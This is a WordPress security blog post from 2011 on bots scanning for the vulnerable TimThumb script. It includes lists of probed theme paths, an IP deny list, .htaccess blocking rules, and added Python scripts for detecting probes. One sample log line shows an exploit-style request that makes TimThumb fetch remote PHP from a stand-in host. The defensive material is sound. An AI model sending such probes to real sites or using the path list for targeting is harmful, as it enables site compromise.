Security Alert: WordPress Timthumb Hacker on the Prowl

As most WordPress bloggers, site owners and administrators will already be aware, the TimThumb script (timthumb.php), widely bundled with WordPress themes and plugins to resize images into thumbnails, has a security vulnerability that gives attackers an easy way into a site: a vulnerable copy will fetch a "remote image" from any host whose name merely contains one of its whitelisted domains and store the result in its cache directory, so an attacker can plant and execute PHP of their own choosing on the server.

The vulnerability was made public at the beginning of August 2011 and was patched almost as soon as it was announced. However, I have noticed an increasing number of crawls of sites I manage by scripts looking for themes and plugins that use timthumb.php. These crawls show up as 404 error reports in both the SEO Ultimate and Redirection plugins, because the files the bots are hunting for do not exist on my servers. In every case, the crawler scanned the directories /wp-content/themes/ and /wp-content/plugins/.

10th Nov. 2011: Please see Bootnote for the best solution.

Scanned Themes and Directories

It looks like the bots are blindly scanning for any theme or plugin that might contain timthumb.php (or its alias, thumb.php), rather than first checking which theme a site actually runs.

The first scans requested the following paths (relative to /wp-content/themes/):

pbv_multi/scripts/timthumb.php
magazinum/scripts/timthumb.php
mypage/scripts/timthumb.php
PersonalPress2/timthumb.php
ElegantEstate/timthumb.php
zenkoreviewRD/scripts/timthumb.php
primely-theme/scripts/timthumb.php
Bold4/timthumb.php
echoes/timthumb.php
arthem-mod/scripts/timthumb.php
manifesto/scripts/timthumb.php
omni-shop/timthumb.php
versatile/timthumb.php
ArtSee/timthumb.php
Aggregate/timthumb.php
Modest/timthumb.php
Glow/timthumb.php
Quadro/timthumb.php
WhosWho/timthumb.php
Wooden/timthumb.php
StudioBlue/timthumb.php
TheSource/timthumb.php
MyResume/timthumb.php
Polished/timthumb.php
Minimal/timthumb.php
TheCorporation/timthumb.php
eVid/timthumb.php
eNews/timthumb.php
Nova/timthumb.php
AskIt/timthumb.php
OnTheGo/timthumb.php
TheProfessional/timthumb.php
eStore/timthumb.php
Bold/timthumb.php
DelicateNews/timthumb.php
DeepFocus/timthumb.php
SimplePress/timthumb.php
PersonalPress/timthumb.php
nool/timthumb.php
TheStyle/timthumb.php
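The scan pattern described above is easy to pick out of a raw Apache access log without relying on a plugin's 404 report. The script below is an added example, not code from the original post: it parses combined-format log lines (a constructed sample is embedded; the addresses are documentation ranges, not the scanners listed further down), flags every request for timthumb.php or thumb.php below /wp-content/themes/ or /wp-content/plugins/, groups the hits by client address, and emits the same "deny from" lines used in the block list that follows. It also reports any probe that answered 2xx, because that means a real copy of timthumb.php is installed at that path and needs patching or deleting, which matters far more than blocking the scanner.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample of Apache "combined" log lines (example data, not real traffic):
# one scanner probing several theme directories, one normal visitor, a second
# scanner whose probe hits an installed copy of timthumb.php (status 200), and
# one malformed line to show that junk is skipped rather than crashing the parser.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Oct/2011:10:12:01 +0000] "GET /wp-content/themes/Bold4/timthumb.php HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Oct/2011:10:12:02 +0000] "GET /wp-content/themes/echoes/timthumb.php HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Oct/2011:10:12:03 +0000] "GET /wp-content/plugins/omni-shop/thumb.php HTTP/1.1" 404 213 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Oct/2011:10:15:44 +0000] "GET /2011/10/some-post/ HTTP/1.1" 200 9812 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Oct/2011:10:15:45 +0000] "GET /wp-content/themes/mytheme/style.css HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
192.0.2.9 - - [18/Oct/2011:11:01:09 +0000] "GET /wp-content/themes/Aggregate/timthumb.php?src=http://example.com/x.php HTTP/1.1" 200 1412 "-" "-"
this line is not in Apache log format
"""

# Apache "combined" format: ip ident user [time] "METHOD path protocol" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# A TimThumb probe: timthumb.php or its thumb.php alias anywhere below
# /wp-content/themes/ or /wp-content/plugins/, with or without a query string.
PROBE_RE = re.compile(
    r'^/wp-content/(?:themes|plugins)/(?:.*/)?(?:timthumb|thumb)\.php(?:\?|$)',
    re.IGNORECASE,
)


def parse_line(line):
    """Return the fields of one access-log line, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m.group("ip"), "path": m.group("path"), "status": int(m.group("status"))}


def find_probes(log_text):
    """Map client address -> list of (path, status) for every request that looks like a TimThumb probe."""
    probes = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and PROBE_RE.match(rec["path"]):
            probes[rec["ip"]].append((rec["path"], rec["status"]))
    return dict(probes)


def live_targets(probes):
    """Probed paths that answered 2xx: a copy of timthumb.php really exists there (query string stripped)."""
    found = set()
    for hits in probes.values():
        for path, status in hits:
            if 200 <= status < 300:
                found.add(path.split("?", 1)[0])
    return sorted(found)


def deny_directives(probes):
    """Render the scanner addresses as 'deny from' lines (the Apache 2.2 syntax used on this page)."""
    def sort_key(ip):
        try:
            addr = ipaddress.ip_address(ip)
            return (addr.version, addr)
        except ValueError:  # HostnameLookups On would log names; sort those last, as text
            return (99, ip)
    return ["deny from %s" % ip for ip in sorted(probes, key=sort_key)]


if __name__ == "__main__":
    hits = find_probes(SAMPLE_LOG)
    for ip, paths in hits.items():
        print("%s probed %d path(s)" % (ip, len(paths)))
    print("installed TimThumb copies hit by scanners:", live_targets(hits))
    print("\n".join(deny_directives(hits)))
```

Run it against a real log with find_probes(open("/var/log/apache2/access.log").read()). A scanner that gets a 404 for every probe is noise; a 200 in live_targets() is the finding to act on first.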

IPs To Block

Place the following Apache directives in the .htaccess file in your site's document root. They tell Apache to deny requests from the listed IP addresses (list updated 20th Oct. 2011). This is the Apache 2.2 access-control syntax and only takes effect if AllowOverride Limit is permitted for the directory. Bear in mind that most of these addresses belong to compromised servers rather than to the attacker, so the list goes stale as hosts clean up (see the removals below) and is a stop-gap, not a fix.

order allow,deny
deny from 107.20.5.217
deny from 108.60.0.1
deny from 109.74.205.87
deny from 113.192.25.251
deny from 119.235.18.7
deny from 122.201.81.10
deny from 132.216.12.109
deny from 157.100.150.150
deny from 173.231.43.98
deny from 173.236.12.155
deny from 173.236.194.65
deny from 173.236.210.19
deny from 173.236.26.2
deny from 173.236.31.34
deny from 173.236.58.146
deny from 173.247.251.145
deny from 173.247.253.234
deny from 173.247.255.106
deny from 173.255.215.156
deny from 174.120.224.230
deny from 174.121.22.98
deny from 174.37.148.250
deny from 178.18.89.103
deny from 180.92.161.2
deny from 184.107.163.186
deny from 184.154.106.34
deny from 184.154.109.10
deny from 184.154.12.138
deny from 184.154.88.234
deny from 184.170.146.10
deny from 184.170.146.12
deny from 187.45.205.144
deny from 188.138.101.216
deny from 188.138.113.14
deny from 188.165.197.177
deny from 189.1.162.125
deny from 189.59.8.23
deny from 192.217.104.152
deny from 195.19.173.244
deny from 195.190.28.97
deny from 195.198.236.62
deny from 195.34.173.153
deny from 200.85.152.29
deny from 203.170.85.123
deny from 203.71.2.73
deny from 204.152.255.10
deny from 204.152.255.23
deny from 204.152.255.5
deny from 204.232.242.215
deny from 204.93.165.124
deny from 206.174.209.32
deny from 206.188.208.194
deny from 208.116.44.250
deny from 208.43.95.131
deny from 208.65.200.160
deny from 208.82.116.113
deny from 208.92.165.10
deny from 209.217.76.244
deny from 209.90.115.252
deny from 210.143.110.58
deny from 212.100.249.178
deny from 212.124.121.206
deny from 212.227.52.169
deny from 212.90.148.43
deny from 212.97.132.142
deny from 213.203.199.227
deny from 216.157.21.223
deny from 216.172.163.58
deny from 216.227.215.130
deny from 216.228.195.2
deny from 216.67.248.51
deny from 217.146.86.201
deny from 219.94.163.214
deny from 27.50.118.53
deny from 46.105.99.176
deny from 46.163.118.14
deny from 46.182.105.98
deny from 46.4.26.81
deny from 50.18.112.172
deny from 50.23.215.156
deny from 62.193.235.191
deny from 62.210.185.4
deny from 64.118.88.213
deny from 64.151.202.1
deny from 64.50.161.65
deny from 64.50.172.176
deny from 64.57.252.67
deny from 65.98.89.106
deny from 66.103.128.12
deny from 66.90.104.180
deny from 67.192.48.157
deny from 67.205.67.105
deny from 67.205.96.182
deny from 67.210.96.112
deny from 67.212.80.5
deny from 67.214.213.94
deny from 68.179.32.90
deny from 69.163.186.200
deny from 69.167.135.119
deny from 69.174.53.88
deny from 69.20.9.79
deny from 69.25.109.177
deny from 69.50.193.168
deny from 69.64.69.113
deny from 69.73.154.97
deny from 70.33.254.92
deny from 70.86.16.74
deny from 71.8.242.4
deny from 72.232.240.70
deny from 72.32.11.21
deny from 72.51.46.77
deny from 74.208.144.19
deny from 74.209.214.7
deny from 74.63.243.194
deny from 75.146.178.52
deny from 76.100.161.249
deny from 77.221.130.44
deny from 77.232.91.201
deny from 78.111.81.242
deny from 78.129.226.96
deny from 78.136.29.89
deny from 79.170.192.52
deny from 79.200.4.226
deny from 80.86.184.50
deny from 80.90.198.194
deny from 81.169.142.131
deny from 81.169.167.190
deny from 81.196.196.141
deny from 81.30.152.53
deny from 81.30.65.78
deny from 82.165.154.71
deny from 82.206.126.166
deny from 82.25.208.111
deny from 82.79.171.134
deny from 83.103.119.239
deny from 83.246.67.55
deny from 83.255.89.137
deny from 85.17.182.195
deny from 85.214.115.197
deny from 85.214.137.104
deny from 86.111.247.16
deny from 87.237.213.212
deny from 87.98.254.234
deny from 88.151.241.51
deny from 88.151.65.162
deny from 88.198.144.210
deny from 88.208.234.133
deny from 88.212.146.235
deny from 89.145.121.100
deny from 89.145.121.101
deny from 89.149.202.94
deny from 89.161.143.111
deny from 89.174.234.147
deny from 89.234.3.28
deny from 91.121.14.107
deny from 91.121.151.69
deny from 91.121.175.169
deny from 91.121.184.160
deny from 91.212.12.60
deny from 91.217.56.93
deny from 92.243.8.135
deny from 93.114.41.80
deny from 94.136.92.101
deny from 94.198.160.91
deny from 94.229.76.221
deny from 94.229.79.69
deny from 94.23.209.161
deny from 94.23.215.208
deny from 94.23.6.59
deny from 94.236.125.213
deny from 95.131.66.39
allow from all
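The same block list written for Apache 2.4, added here as an example and not part of the original post. Order, Deny and Allow are the 2.2 directives; on 2.4 they only work while the compatibility module mod_access_compat is loaded, and the native form is Require from mod_authz_core, which in an .htaccess file needs AllowOverride AuthConfig. Only the first three addresses from the list above are shown; the rest follow the same pattern.

```apache
# Apache 2.4 equivalent of "order allow,deny / deny from ... / allow from all".
# Needs AllowOverride AuthConfig for this directory when placed in .htaccess
# (or put the block inside the vhost's <Directory> instead).
<RequireAll>
    Require all granted
    Require not ip 107.20.5.217
    Require not ip 108.60.0.1
    Require not ip 109.74.205.87
    # ... one "Require not ip" line per remaining address in the list above
</RequireAll>
```

Require not ip also accepts a network prefix (for example 192.0.2.0/24) where a whole range is known to be hostile, but prefer single addresses for a list built from scanner sightings.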

The following IP addresses have been removed from the above list after the hosts or webmasters concerned replied to my alerts that their servers had been hacked.

deny from 69.175.60.114

Security Recommendations

Delete any themes and plugins you no longer use, and keep WordPress and all installed themes and plugins up to date. Note that each theme or plugin ships its own copy of timthumb.php, so a copy only gets fixed when that theme or plugin is updated; check every copy under wp-content, not just one.

There is a plugin available on wordpress.org that scans your wp-content directory for unpatched copies of TimThumb.

Block public HTTP access to timthumb.php (and thumb.php) with an .htaccess FilesMatch directive. Copy and paste this block into your topmost .htaccess file:

<FilesMatch "^(wp-config\.php|install\.php|php\.ini|php5\.ini|readme\.html|bb-config\.php|\.htaccess|readme\.txt|timthumb\.php|thumb\.php|error_log|error\.log)">
 Deny from all
</FilesMatch>

The caret, ^, anchors the match to the start of the file name; the parentheses, (), group a set of alternatives; the backslash before each full stop makes Apache treat it as a literal full stop rather than the regex wildcard for "any character"; and the pipe, |, separates the alternatives ("OR"). Because there is no closing $ anchor, names that merely start with one of the entries (timthumb.php.bak, wp-config.php.orig) are matched too, which is usually what you want.

The above block tells Apache to refuse requests for wp-config.php, install.php, php.ini, php5.ini, readme.html, bb-config.php, .htaccess, readme.txt, timthumb.php, thumb.php, error_log and error.log in the directory holding the .htaccess file and every directory below it.

The rule only governs HTTP requests; it does not change the files on disk, so WordPress (PHP running as the web-server user) can still read wp-config.php and include the other files, and you can still view or edit them over SSH, SFTP or FTP. Bots cannot fetch them and visitors cannot call them. One caveat: if a theme you use genuinely relies on TimThumb, the browser requests timthumb.php directly to load each thumbnail, so this rule will break those images. In that case update the theme's copy of TimThumb to the patched version instead of blocking it.

Once added, you will notice that most scanners give up after their first probe, because Apache now answers with a 403 "Forbidden" ("You do not have permission to access this file") instead of a 404.
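A quick way to check what the FilesMatch rule above actually covers, added here as an example and not part of the original post: Apache tests a FilesMatch regex against the file-name component of the request only, so the directory and any query string are irrelevant, and the unanchored end of the pattern means "starts with". The script copies the page's pattern verbatim and classifies a few constructed request paths.

```python
import posixpath
import re

# The FilesMatch pattern from the .htaccess block above, copied verbatim.
FILES_MATCH = re.compile(
    r"^(wp-config\.php|install\.php|php\.ini|php5\.ini|readme\.html|bb-config\.php|"
    r"\.htaccess|readme\.txt|timthumb\.php|thumb\.php|error_log|error\.log)"
)


def would_be_denied(request_path):
    """True if Apache's FilesMatch would deny this request.

    FilesMatch matches the file name only: strip the query string and the
    directory first. re.search with the pattern's leading ^ and no trailing $
    reproduces Apache's 'starts with' behaviour.
    """
    name = posixpath.basename(request_path.split("?", 1)[0])
    return FILES_MATCH.search(name) is not None


def classify(paths):
    """Map each request path to whether the rule denies it."""
    return {p: would_be_denied(p) for p in paths}


# Constructed request paths covering the interesting cases.
SAMPLE_PATHS = [
    "/wp-content/themes/Bold4/timthumb.php",                      # scanner probe: denied
    "/wp-content/plugins/omni-shop/thumb.php?src=http://x/y.php",  # alias + query: denied
    "/wp-content/themes/Nova/timthumb.php.bak",                   # backup copy: denied (no $ anchor)
    "/wp-content/themes/Nova/mytimthumb.php",                     # prefixed name: NOT denied (^ anchor)
    "/wp-content/themes/Nova/style.css",                          # ordinary asset: not denied
    "/wp-config.php",                                             # at the root: denied
]

if __name__ == "__main__":
    for path, denied in classify(SAMPLE_PATHS).items():
        print("%-62s %s" % (path, "403" if denied else "pass"))
```

If you need TimThumb itself to keep working for one theme, the pattern has to drop timthumb.php and thumb.php; there is no way to allow the legitimate theme copy and deny the others by file name alone, since the scanner requests look identical.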

Bootnote

I have found a better solution than blocking individual IP addresses and bad hosts.

.htaccess rewrite rules can be used to block many RFI, XSS and SQL injection attacks regardless of where they come from.

Read the WordPress Security Hardening Tips here.

What Next?

When possible, I contact website owners, and their hosts if the site owner fails to respond, to alert them to malicious scripts on their servers. Maybe you could do the same to help rid the Net of malicious bots.

Suggestions for removing and updating TimThumb are given at WP Service Masters.

If you think you have been hacked, back up and download your wp-content directory, any files and directories you have created, and your database before deleting everything and reinstalling WordPress. A good guide to this is found at WP Service Masters.
